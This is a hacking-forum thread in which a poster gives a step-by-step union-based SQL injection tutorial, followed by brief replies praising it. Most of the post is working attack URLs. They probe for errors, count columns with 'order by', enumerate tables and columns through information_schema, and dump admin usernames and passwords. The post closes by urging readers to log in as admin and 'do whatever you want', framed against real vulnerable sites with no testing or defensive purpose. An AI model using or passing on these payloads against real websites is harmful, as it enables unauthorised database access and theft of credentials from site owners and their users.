[blazer15]

1. Find a vulnerable website. here is a example!

2.
http://www.site.com/index.php?=5'

Pson't type error after after this (--)

3.
http://www.site.com/index.php?=5 order by 10-- error

http://www.site.com/index.php?=5 order by 9-- error

http://www.site.com/index.php?=5 order by 8-- No error
:cheers:

4. the site has 8 columns.

5. Do like below

6.
http://www.site.com/index.php?=-5 union select 1,2,3,4,5,6,7,8--

7. This will show some numbers on the page lets say it is number 3 on the page.

8.Let's get some tables:
http://www.site.com/index.php?=-5 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables--

9. You will see tables: check for anything like admin, username, user. I found admin and lets start harvesting

10.Type this:
http://www.site.com/index.php?=-5 union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=database()--

11.Now you have the table name and the name is admin that you finded before this.Now the columns that you will see right now is maybe Username or Password.

12. Soo to get the password and username from admin type this.

13.
http://www.site.com/index.php?=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8 from admin

14. And press enter.

15. you will see this. username:password.
ps: the password can be plain text or in a hash
16. now get admin page and login and do whatever you want.

17. creedits to blazer15. :cheers:

I tried my best! but i hope it will help you:blackhat:

[Bannedshee]

Great tutorial, i really need to learn more about SQLi, although please work on your grammar

[blazer15]

Great tutorial, i really need to learn more about SQLi, although please work on your grammar

Thank you very much!

[Kinanizer]

Decent TUT, looks like you put it together in under 30 mins though. Might want to make it more of a walk-through.